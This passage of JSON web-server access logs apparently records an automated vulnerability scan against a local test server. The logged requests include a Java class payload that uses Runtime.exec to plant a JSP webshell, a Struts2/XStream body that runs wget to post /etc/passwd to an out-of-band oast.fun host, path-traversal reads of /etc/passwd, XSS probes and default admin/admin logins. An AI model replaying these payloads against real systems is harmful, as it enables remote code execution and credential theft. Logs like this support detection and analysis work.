+0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal/fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.161","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22sendForgotPasswordEmail\x5C\x22,\x5C\x22params\x5C\x22:[\x5C\x22user@local.email\x5C\x22],\x5C\x22id\x5C\x22:\x5C\x223\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22csrf_token\x22\x0D\x0A\x0D\x0A{{csrf}}\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTr8iAm5bD6TOpFzjZOUjokW.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x0D\x0A \x22type\x22: \x22297MTr8iAm5bD6TOpFzjZOUjokW\x22\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /variable/varimport HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/admin/variable/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A c9v8h88smpv8c1ig07h0cyoiihsq7no9p.oast.fun\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.164","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.160","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.163","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 